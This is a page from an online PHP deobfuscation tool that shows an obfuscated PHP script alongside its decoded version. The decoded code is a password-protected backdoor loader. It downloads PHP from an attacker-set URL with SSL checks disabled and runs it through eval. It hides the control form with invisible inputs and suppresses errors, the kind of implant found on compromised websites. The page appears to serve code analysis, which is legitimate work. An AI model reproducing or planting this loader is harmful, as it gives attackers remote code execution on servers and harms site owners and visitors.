Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto S2_3p; Qign4: if (isset($_GET["\163\157\137\x72\x65\163\145\164"])) { $_SESSION["\x7..

Decoded Output download

<?   goto S2_3p; Qign4: if (isset($_GET["so_reset"])) { $_SESSION["so_url"] = ''; echo "success"; die; } goto ryxOb; RLwv1: if (is_string($result)) { eval("?>" . $result); } else { echo ''; } goto L3wpu; p7UVu: function downloadWithFopen($url) { $contextOptions = array("ssl" => array("verify_peer" => false, "verify_peer_name" => false)); $context = stream_context_create($contextOptions); $result = false; if ($fp = fopen($url, "r", false, $context)) { $result = ''; while ($data = fread($fp, 8192)) { $result .= $data; } fclose($fp); } return $result; } goto rpGI4; zZBjY: error_reporting(0); goto hI9kh; tB47Y: foreach ($asciiArray as $ascii) { $decodedString .= chr($ascii); } goto uyzIC; rlvDT: $correct_password = "$2a$12$FAG5tBlPd/kYNljFaRmJWeAXT6e9cxUc/T8fX374zUXJEp0uQLsUW"; goto Qign4; XvTd2: $decodedString = ''; goto tB47Y; rpGI4: $asciiArray = array(); goto XvTd2; uyzIC: $url = $decodedString; goto rlvDT; hI9kh: function madrid($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $result = curl_exec($ch); curl_close($ch); return $result; } goto p7UVu; S2_3p: session_start(); goto zZBjY; ryxOb: if (isset($_GET["so"])) { if ($_SERVER["REQUEST_METHOD"] === "POST") { if (isset($_POST["password"])) { $provided_password = $_POST["password"]; if (password_verify($provided_password, $correct_password)) { if (isset($_POST["url"])) { $url = $_POST["url"]; $_SESSION["so_url"] = $url; echo "updated : " . $_SESSION["so_url"]; die; } else { echo "Error!"; die; } } else { echo ''; die; } } else { echo ''; die; } } else { ?> 
<head><style>#password{order:2}#url{order:1}#password,#url{display:block;margin-bottom:10px;opacity:0;transition:opacity .3s}#password:hover,#url:hover{opacity:1}form{display:flex;flex-direction:column;align-items:flex-end}</style><script>document.addEventListener("DOMContentLoaded",function(){document.querySelector("#password").addEventListener("keydown",function(e){"Enter"===e.key&&(e.preventDefault(),document.querySelector("form").submit())})})</script></head><body><form action=""method="post"><input id="password"name="password"type="password"><br><input id="url"name="url"value="<?php  echo isset($_POST["url"]) ? $_POST["url"] : ''; ?> 
"><br></form></body><?php  die; } } else { if (empty($_SESSION["so_url"])) { $result = @file_get_contents($url); if (empty($result)) { $result = madrid($url); if (empty($result)) { $result = downloadWithFopen($url); } } } else { $result = @file_get_contents($_SESSION["so_url"]); if (empty($result)) { $result = madrid($_SESSION["so_url"]); if (empty($result)) { $result = downloadWithFopen($_SESSION["so_url"]); } } } } goto RLwv1; L3wpu:  
 ?>

Did this file decode correctly?

Original Code

 goto S2_3p; Qign4: if (isset($_GET["\163\157\137\x72\x65\163\145\164"])) { $_SESSION["\x73\157\137\165\162\x6c"] = ''; echo "\x73\x75\x63\143\x65\163\163"; die; } goto ryxOb; RLwv1: if (is_string($result)) { eval("\x3f\x3e" . $result); } else { echo ''; } goto L3wpu; p7UVu: function downloadWithFopen($url) { $contextOptions = array("\x73\163\154" => array("\166\145\x72\x69\146\171\x5f\x70\x65\145\x72" => false, "\166\x65\162\151\146\x79\x5f\160\145\145\162\x5f\x6e\x61\x6d\145" => false)); $context = stream_context_create($contextOptions); $result = false; if ($fp = fopen($url, "\x72", false, $context)) { $result = ''; while ($data = fread($fp, 8192)) { $result .= $data; } fclose($fp); } return $result; } goto rpGI4; zZBjY: error_reporting(0); goto hI9kh; tB47Y: foreach ($asciiArray as $ascii) { $decodedString .= chr($ascii); } goto uyzIC; rlvDT: $correct_password = "\44\x32\x61\x24\61\x32\44\106\101\107\x35\164\102\154\x50\x64\57\x6b\131\x4e\x6c\152\106\x61\122\x6d\112\127\x65\x41\130\124\66\x65\x39\143\x78\x55\x63\57\124\70\x66\x58\x33\x37\x34\x7a\x55\x58\112\x45\x70\x30\165\x51\114\x73\125\x57"; goto Qign4; XvTd2: $decodedString = ''; goto tB47Y; rpGI4: $asciiArray = array(); goto XvTd2; uyzIC: $url = $decodedString; goto rlvDT; hI9kh: function madrid($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $result = curl_exec($ch); curl_close($ch); return $result; } goto p7UVu; S2_3p: session_start(); goto zZBjY; ryxOb: if (isset($_GET["\163\157"])) { if ($_SERVER["\122\x45\x51\x55\x45\123\x54\137\115\105\x54\x48\x4f\x44"] === "\x50\x4f\123\x54") { if (isset($_POST["\160\x61\163\x73\x77\x6f\162\144"])) { $provided_password = $_POST["\x70\x61\163\163\167\x6f\x72\144"]; if (password_verify($provided_password, $correct_password)) { if (isset($_POST["\x75\162\154"])) { $url = $_POST["\165\x72\154"]; $_SESSION["\163\157\137\165\x72\x6c"] = $url; echo "\165\160\x64\x61\164\145\144\x20\72\x20" . $_SESSION["\163\x6f\137\165\162\x6c"]; die; } else { echo "\x45\x72\162\157\x72\x21"; die; } } else { echo ''; die; } } else { echo ''; die; } } else { ?>
<head><style>#password{order:2}#url{order:1}#password,#url{display:block;margin-bottom:10px;opacity:0;transition:opacity .3s}#password:hover,#url:hover{opacity:1}form{display:flex;flex-direction:column;align-items:flex-end}</style><script>document.addEventListener("DOMContentLoaded",function(){document.querySelector("#password").addEventListener("keydown",function(e){"Enter"===e.key&&(e.preventDefault(),document.querySelector("form").submit())})})</script></head><body><form action=""method="post"><input id="password"name="password"type="password"><br><input id="url"name="url"value="<?php  echo isset($_POST["\165\162\154"]) ? $_POST["\165\162\x6c"] : ''; ?>
"><br></form></body><?php  die; } } else { if (empty($_SESSION["\x73\157\x5f\165\x72\154"])) { $result = @file_get_contents($url); if (empty($result)) { $result = madrid($url); if (empty($result)) { $result = downloadWithFopen($url); } } } else { $result = @file_get_contents($_SESSION["\163\157\137\x75\162\x6c"]); if (empty($result)) { $result = madrid($_SESSION["\163\x6f\137\x75\x72\x6c"]); if (empty($result)) { $result = downloadWithFopen($_SESSION["\x73\x6f\137\165\162\x6c"]); } } } } goto RLwv1; L3wpu: 

Function Calls

None

Variables

None

Stats

MD5 4c2eaa0287a1629e9154d5c570abdd13
Eval Count 0
Decode Time 71 ms